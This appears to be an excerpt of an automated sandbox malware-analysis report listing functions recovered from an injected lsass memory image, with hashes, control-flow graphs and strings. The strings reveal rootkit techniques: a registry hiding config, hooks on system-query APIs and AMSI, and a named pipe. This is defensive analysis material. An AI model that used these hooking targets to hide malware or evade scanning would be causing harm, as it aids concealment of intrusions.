                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: 15f99206912596879e935c3c75b41efed11471d7dea19b4e69155ac3cccb53e7
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: F6314B37214B80D6EB60CF25E88879E73A4F788754F550227EB9D47BAADF38C1598B00
                                                        Function 00000202C0AF0018 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: 5936a836a689bba17aae5a154ffd51961503c81b4dbbf5008d60181b3871c08f
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: 47E1C972B14B80CAF700CB66D4886ED7BB1F344788F118217DF9A57B9ADA39C41AC700
                                                        Function 00000202C0ABB150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000003.1777918856.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_3_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: 2b9c6a68379746dcfe5f620ac0ed271bb4b3953634cda9960974bdcd68c4b130
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: 9751C172720B94C5FF14CFA6989CAED27A5F758BD8F464523DF1907B86DA78C0498700
                                                        Function 00000202C0AE1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: 75d6cc8a7f60c5d7a0a3abb83b5a96dac93481f8566d0d9967f6edc72b15a74e
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 2271E577210B50C6FB109F65E8DCA9D27A4FB98F88F4211239B9E47B6ADE39C458C740
                                                        Function 00000202C0AE1D3C Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00000202C0AE1D47
                                                          • Part of subcall function 00000202C0AE20C0: GetModuleHandleA.KERNEL32(?,?,?,00000202C0AE1D79), ref: 00000202C0AE20D8
                                                          • Part of subcall function 00000202C0AE20C0: GetProcAddress.KERNEL32(?,?,?,00000202C0AE1D79), ref: 00000202C0AE20E9
                                                          • Part of subcall function 00000202C0AE5F50: GetCurrentThreadId.KERNEL32 ref: 00000202C0AE5F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: ab7f1544dc09a014935df39d3da6b105c6b9b77b85d5372d75e804ce5cf0b645
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: D8418AE2111B8AE0FA04EB68E8DE7DC2325A754384F834423A75907177DF79D66EC360
                                                        Function 00000202C0AE12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: baec013df6fc4971ffce898cd0bab83a3fc7025cc8603e9994d371d503a8ae48
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: 00512773205B84C6EB54CF62E48C39EB7A1F788F98F458226DB8907759DF39C0598B00
                                                        Function 00000202C0AB6D30 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000003.1777918856.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_3_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 72a15d6eb1e62704baa27dbf34ca553b203cd5cd033cc7637bf2fc98f3c886de
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 9C81AF31600B41C6FA60AB69A8CD3AD26D5AB45780F475527EB08477A7DB7DCA4E8700
                                                        Function 00000202C0AE2FA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: dc2b6e7dce2111566ed5963f35cc85bffcebf545e0d294b35b69bb20662b1d05
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 9E31A723608B81D6FB10DF22A88C35DA3A0F798BD5F464627DF8943B26DF38C5598740
                                                        Function 00000202C0AE30B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: d73814f5febecb032752754b0a7a611fbdcb6e6f59b240e9049195530b892124
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: 5F317163618B81D6FB50DF66A88C76E63A0F784F85F06422BDF9A43726DF38C4198700
                                                        Function 00000202C0AE2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 238librarystringloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 302 202c0ae2c10-202c0ae2c8d 304 202c0ae2e8c-202c0ae2eaf 302->304 305 202c0ae2c93-202c0ae2c99 302->305 305->304 306 202c0ae2c9f-202c0ae2ca2 305->306 306->304 307 202c0ae2ca8-202c0ae2cab 306->307 307->304 308 202c0ae2cb1-202c0ae2cc1 GetModuleHandleA 307->308 309 202c0ae2cd5 308->309 310 202c0ae2cc3-202c0ae2cd3 GetProcAddress 308->310 311 202c0ae2cd8-202c0ae2cf6 309->311 310->311 311->304 313 202c0ae2cfc-202c0ae2d1b StrCmpNIW 311->313 313->304 314 202c0ae2d21-202c0ae2d25 313->314 314->304 315 202c0ae2d2b-202c0ae2d35 314->315 315->304 316 202c0ae2d3b-202c0ae2d3f 315->316 316->304 317 202c0ae2d45 316->317 318 202c0ae2d4c-202c0ae2d5f 317->318 319 202c0ae2d61-202c0ae2d6d 318->319 320 202c0ae2d6f 318->320 321 202c0ae2d72-202c0ae2d76 319->321 320->321 322 202c0ae2d78-202c0ae2d84 321->322 323 202c0ae2d86 321->323 324 202c0ae2d89-202c0ae2d93 322->324 323->324 325 202c0ae2eb0-202c0ae2eb4 324->325 326 202c0ae2d99-202c0ae2d9c 324->326 327 202c0ae2e6e-202c0ae2e81 325->327 328 202c0ae2eb6-202c0ae2eb9 325->328 329 202c0ae2d9e-202c0ae2db2 call 202c0ae1934 326->329 330 202c0ae2db5-202c0ae2db8 326->330 327->318 336 202c0ae2e87 327->336 331 202c0ae2ed1-202c0ae2ed4 328->331 332 202c0ae2ebb-202c0ae2ece call 202c0ae1934 328->332 329->330 334 202c0ae2e1f-202c0ae2e22 330->334 335 202c0ae2dba-202c0ae2dc5 330->335 341 202c0ae2ed6-202c0ae2ee1 331->341 342 202c0ae2f02-202c0ae2f05 331->342 332->331 337 202c0ae2e34-202c0ae2e41 lstrlenW 334->337 338 202c0ae2e24 334->338 343 202c0ae2dea-202c0ae2ded 335->343 344 202c0ae2dc7-202c0ae2dd4 335->344 336->304 347 202c0ae2e55-202c0ae2e61 call 202c0ae3c70 337->347 348 202c0ae2e43-202c0ae2e4f call 202c0ae1bf4 337->348 345 202c0ae2e27-202c0ae2e2e call 202c0ae1bbc 338->345 341->342 349 202c0ae2ee3-202c0ae2ef0 341->349 342->337 351 202c0ae2f0b-202c0ae2f0d 342->351 343->334 352 202c0ae2def-202c0ae2dfa 343->352 350 202c0ae2dd8-202c0ae2dde 344->350 345->337 357 202c0ae2f19-202c0ae2f24 345->357 367 202c0ae2f12 347->367 368 202c0ae2e67 347->368 348->347 348->367 355 202c0ae2ef4-202c0ae2efa 349->355 350->357 358 202c0ae2de4-202c0ae2de8 350->358 351->345 352->334 359 202c0ae2dfc-202c0ae2e09 352->359 355->357 362 202c0ae2efc-202c0ae2f00 355->362 364 202c0ae2f26-202c0ae2f2a 357->364 365 202c0ae2f92-202c0ae2f99 357->365 358->343 358->350 366 202c0ae2e0d-202c0ae2e13 359->366 362->342 362->355 369 202c0ae2f2c-202c0ae2f30 364->369 370 202c0ae2f32-202c0ae2f47 call 202c0ae89d0 364->370 365->327 366->357 371 202c0ae2e19-202c0ae2e1d 366->371 367->357 368->327 369->370 372 202c0ae2f4c-202c0ae2f4f 369->372 370->372 371->334 371->366 374 202c0ae2f51-202c0ae2f6a call 202c0ae89d0 372->374 375 202c0ae2f6f-202c0ae2f72 372->375 374->375 375->365 377 202c0ae2f74-202c0ae2f8d call 202c0ae89d0 375->377 377->365
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: 1f7527f8dc7d92e78c3b64f47bf903be05fe56f062dfcd769cd478dd37487d5e
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 4EA18832200BD0C2FB688B25D48C6AD67A5F784B94F164027DF9953B9ADB35CCA9C380
                                                        Function 00000202C0AE104C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 379 202c0ae104c-202c0ae10b9 RegQueryInfoKeyW 380 202c0ae10bf-202c0ae10c9 379->380 381 202c0ae11b7-202c0ae11d2 379->381 380->381 382 202c0ae10cf-202c0ae111f RegEnumValueW 380->382 383 202c0ae11a7-202c0ae11b1 382->383 384 202c0ae1125-202c0ae112a 382->384 383->381 383->382 384->383 385 202c0ae112c-202c0ae1137 384->385 386 202c0ae1149-202c0ae114e 385->386 387 202c0ae1139 385->387 389 202c0ae1150-202c0ae119b GetProcessHeap HeapAlloc GetProcessHeap HeapFree 386->389 390 202c0ae119d-202c0ae11a5 386->390 388 202c0ae113d-202c0ae1141 387->388 388->383 391 202c0ae1143-202c0ae1147 388->391 389->390 390->383 391->386 391->388
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: 24bdfa1f3a3a6cbb920579a34c4224a1fa358229da05e14721e73508cdc3a0cc
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: 8F414C33214BC0C6EB60CF62E48879E77A1F389B98F45821ADB8947B58DF39C559CB40
                                                        Function 00000202C0AE2344 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 947e85be21f9d62775cb4baf97d7fb24950026edc3eb04451a6acccd281c1e17
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: 7E112632618B80C2F7108B21F48C75EA760F389BE4F514217EBAA06AA9CF3DC14DCB04
                                                        Function 00000202C0AE7930 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 397 202c0ae7930-202c0ae7936 398 202c0ae7971-202c0ae797b 397->398 399 202c0ae7938-202c0ae793b 397->399 400 202c0ae7a98-202c0ae7aad 398->400 401 202c0ae793d-202c0ae7940 399->401 402 202c0ae7965-202c0ae79a4 call 202c0ae7fe0 399->402 406 202c0ae7aaf 400->406 407 202c0ae7abc-202c0ae7ad6 call 202c0ae7e74 400->407 404 202c0ae7958 __scrt_dllmain_crt_thread_attach 401->404 405 202c0ae7942-202c0ae7945 401->405 419 202c0ae79aa-202c0ae79bf call 202c0ae7e74 402->419 420 202c0ae7a72 402->420 408 202c0ae795d-202c0ae7964 404->408 410 202c0ae7951-202c0ae7956 call 202c0ae7f24 405->410 411 202c0ae7947-202c0ae7950 405->411 412 202c0ae7ab1-202c0ae7abb 406->412 417 202c0ae7b0f-202c0ae7b40 call 202c0ae81b0 407->417 418 202c0ae7ad8-202c0ae7b0d call 202c0ae7f9c call 202c0ae7e3c call 202c0ae8338 call 202c0ae8150 call 202c0ae8174 call 202c0ae7fcc 407->418 410->408 429 202c0ae7b51-202c0ae7b57 417->429 430 202c0ae7b42-202c0ae7b48 417->430 418->412 432 202c0ae7a8a-202c0ae7a97 call 202c0ae81b0 419->432 433 202c0ae79c5-202c0ae79d6 call 202c0ae7ee4 419->433 423 202c0ae7a74-202c0ae7a89 420->423 435 202c0ae7b9e-202c0ae7bb4 call 202c0ae3618 429->435 436 202c0ae7b59-202c0ae7b63 429->436 430->429 434 202c0ae7b4a-202c0ae7b4c 430->434 432->400 449 202c0ae79d8-202c0ae79fc call 202c0ae82fc call 202c0ae7e2c call 202c0ae7e58 call 202c0ae9dfc 433->449 450 202c0ae7a27-202c0ae7a31 call 202c0ae8150 433->450 440 202c0ae7c3f-202c0ae7c4c 434->440 457 202c0ae7bec-202c0ae7bee 435->457 458 202c0ae7bb6-202c0ae7bb8 435->458 441 202c0ae7b6f-202c0ae7b7d 436->441 442 202c0ae7b65-202c0ae7b6d 436->442 447 202c0ae7b83-202c0ae7b98 call 202c0ae7930 441->447 461 202c0ae7c35-202c0ae7c3d 441->461 442->447 447->435 447->461 449->450 497 202c0ae79fe-202c0ae7a05 __scrt_dllmain_after_initialize_c 449->497 450->420 471 202c0ae7a33-202c0ae7a3f call 202c0ae81a0 450->471 459 202c0ae7bf0-202c0ae7bf3 457->459 460 202c0ae7bf5-202c0ae7c0a call 202c0ae7930 457->460 458->457 466 202c0ae7bba-202c0ae7bdc call 202c0ae3618 call 202c0ae7a98 458->466 459->460 459->461 460->461 480 202c0ae7c0c-202c0ae7c16 460->480 461->440 466->457 492 202c0ae7bde-202c0ae7be3 466->492 488 202c0ae7a41-202c0ae7a4b call 202c0ae80b8 471->488 489 202c0ae7a65-202c0ae7a70 471->489 485 202c0ae7c21-202c0ae7c31 480->485 486 202c0ae7c18-202c0ae7c1f 480->486 485->461 486->461 488->489 496 202c0ae7a4d-202c0ae7a5b 488->496 489->423 492->457 496->489 497->450 498 202c0ae7a07-202c0ae7a24 call 202c0ae9d98 497->498 498->450
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: d432669762527435b42ef1848043dcdde929fd9ecb5280a77596072b64fe3a5c
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 318116226043C1C6FB54AB65A8CD35D2291AB85BC0F564127DBE987797DF39CB6E8300
                                                        Function 00000202C0AE9930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
